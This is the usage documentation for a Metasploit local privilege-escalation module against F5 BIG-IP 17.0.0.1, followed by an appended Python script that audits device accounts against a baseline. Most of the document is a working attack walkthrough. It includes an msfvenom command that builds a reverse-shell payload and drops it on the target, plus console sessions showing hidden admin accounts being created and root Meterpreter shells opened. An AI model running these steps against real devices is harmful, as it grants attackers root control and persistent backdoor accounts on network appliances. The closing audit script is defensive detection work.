## Vulnerable Application

The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be downloaded as a VMWare image for free (you have to create an account) from https://downloads.f5.com. You can register for a free 30-day trial if you like, but it's not required to test this.

Boot the VM and set an admin password by logging in with the default credentials (admin / admin). You'll need that password.

## Verification Steps

1. Install the application
2. Start `msfconsole`
3. Do: Get a non-root session somehow (e.g. `use multi/handler` / `set PAYLOAD linux/x64/meterpreter_reverse_tcp`, then):

   ```
   ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 /bin/bash << EOF
   chmod +x /tmp/testexploit.elf
   sudo -u apache /tmp/testexploit.elf
   EOF
   ```

4. Do: `use exploit/linux/local/f5_create_user`
5. Do: `set SESSION <session id>`
6. Do: `run`
7. You should get a session

## Options

### `USERNAME` / `PASSWORD`

The username and final password for the account. If blank, they'll be randomly generated.

### `CREATE_SESSION`

If set (which is the default), will spawn a root session. Otherwise, simply creates the account.

## Scenarios

### F5 Big-IP 17.0.0.1 - Create a session with random creds

First, get a non-root session however you can. You can use a `multi/handler` and `msfvenom`:

```
msf > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf exploit(multi/handler) > set PAYLOAD linux/x64/meterpreter_reverse_tcp
PAYLOAD => linux/x64/meterpreter_reverse_tcp
msf exploit(multi/handler) > set LHOST 10.0.0.179
LHOST => 10.0.0.179
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:34140) at 2022-11-14 15:59:49 -0800
[...run the payload...]
meterpreter > getuid
Server username: apache
meterpreter > bg
msf exploit(multi/handler) > setg SESSION 1
SESSION => 1
```

To create and run the payload, in another window:

```
$ ./msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.0.0.179 LPORT=4444 -f elf > testexploit.elf && chmod +x testexploit.elf && scp testexploit.elf root@10.0.0.162:/tmp && ssh root@10.0.0.162 sudo -u apache /tmp/testexploit.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 1068640 bytes
Final size of elf file: 1068640 bytes
testexploit.elf
```

Now that we have a session, we can just run the module:

```
msf exploit(multi/handler) > use exploit/linux/local/f5_create_user
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user 7yI5vLIK / woquVd36PhcG, then change password to 9d9s83bBPwu5 when creating a session
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40168 bytes) to 10.0.0.162
[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:45254) at 2022-11-14 16:02:10 -0800
meterpreter > getuid
Server username: root
```

### F5 Big-IP 17.0.0.1 - Create a session with set creds

Create a session as shown above, then:

```
msf exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser
USERNAME => mymsfdemouser
msf exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf exploit(linux/local/f5_create_user) > set VERBOSE true
VERBOSE => true
msf exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user mymsfdemouser / QVEE0pqM7pAd, then change password to mybigmsfdemopassword when creating a session
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
[*] Attempting create a root session...
[*] Sending stage (40164 bytes) to 10.0.0.162
[*] Output from su command: Password: You are required to change your password immediately (root enforced) (current) BIG-IP password: New BIG-IP password: Retype new BIG-IP password: Changing password for mymsfdemouser.
[*] Meterpreter session 3 opened (10.0.0.179:4444 -> 10.0.0.162:49646) at 2022-11-14 16:03:04 -0800
meterpreter > getuid
Server username: root
```

### F5 Big-IP 17.0.0.1 - Just create an account with random creds

Get a session as shown above, then:

```
msf exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user hKjGGrlU / yRQijFQjVjqa
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
```

### F5 Big-IP 17.0.0.1 - Just create an account with set creds

Get a session as shown above, then:

```
msf exploit(linux/local/f5_create_user) > set CREATE_SESSION false
CREATE_SESSION => false
msf exploit(linux/local/f5_create_user) > set USERNAME mymsfdemouser2
USERNAME => mymsfdemouser2
msf exploit(linux/local/f5_create_user) > set PASSWORD mybigmsfdemopassword
PASSWORD => mybigmsfdemopassword
msf exploit(linux/local/f5_create_user) > exploit
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[+] Service didn't return an error, so user was likely created!
^C[*] Exploit completed, but no session was created.
```

### F5 Big-IP 17.0.0.1 - Create an account with an error

Get a session as shown above, then (we use a duplicate username):

```
[*] Started reverse TCP handler on 10.0.0.179:4444
[*] Will attempt to create user mymsfdemouser2 / mybigmsfdemopassword
[*] Hashing the password with a pseudorandom salt
[-] mcp query returned an error message: 01020066:3: The requested user (mymsfdemouser2) already exists in partition Common. (code: 16908390)
```
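Every scenario above leaves a new local account on the BIG-IP (and, with `CREATE_SESSION` set, a root shell), so the artefact a defender can look for is an account that nobody provisioned. As an added example that is not part of this module's documentation or of Metasploit, the Python script below audits the accounts on a device against an expected baseline. It assumes an administrator has captured the output of `tmsh list auth user`; the sample text embedded in the script is constructed to resemble that output, and its exact layout, the baseline account names, and the check on the `shell` attribute are all assumptions for the example.

```python
import re
from typing import Dict, List, Set

# Constructed sample resembling `tmsh list auth user` output on BIG-IP.
# The exact layout is an assumption for this example. The third account
# stands in for one created by the module in the scenarios above.
SAMPLE_TMSH_OUTPUT = """\
auth user admin {
    description "Admin User"
    partition-access {
        all-partitions {
            role admin
        }
    }
    shell none
}
auth user monitoring {
    description "Read-only monitoring account"
    partition-access {
        all-partitions {
            role auditor
        }
    }
    shell none
}
auth user mymsfdemouser {
    partition-access {
        all-partitions {
            role admin
        }
    }
    shell bash
}
"""

# Accounts the operations team expects to exist (constructed baseline).
BASELINE: Set[str] = {"admin", "monitoring"}

# One "auth user NAME { ... }" block: the closing brace of a top-level block
# sits at column 0, which the nested, indented braces never do.
USER_BLOCK = re.compile(r"^auth user (\S+) \{(.*?)^\}", re.MULTILINE | re.DOTALL)
ROLE = re.compile(r"\brole (\S+)")
SHELL = re.compile(r"\bshell (\S+)")


def parse_users(output: str) -> Dict[str, Dict[str, str]]:
    """Return {username: {"role": ..., "shell": ...}} from tmsh-style output."""
    users: Dict[str, Dict[str, str]] = {}
    for name, body in USER_BLOCK.findall(output):
        role = ROLE.search(body)
        shell = SHELL.search(body)
        users[name] = {
            "role": role.group(1) if role else "unknown",
            "shell": shell.group(1) if shell else "unknown",
        }
    return users


def audit(output: str, baseline: Set[str]) -> List[str]:
    """Flag accounts outside the baseline and any account with an interactive shell."""
    findings: List[str] = []
    for name, attrs in sorted(parse_users(output).items()):
        if name not in baseline:
            findings.append(
                f"unexpected account {name!r} (role={attrs['role']}, shell={attrs['shell']})"
            )
        if attrs["shell"] == "bash":
            findings.append(f"account {name!r} has an interactive shell")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_TMSH_OUTPUT, BASELINE):
        print(finding)
```

Running this against a saved capture flags `mymsfdemouser` twice: once because it is absent from the baseline and once for its interactive shell. In practice the baseline would come from configuration management rather than a literal in the script, and the audit would run on a schedule so that an account added between reviews is caught promptly.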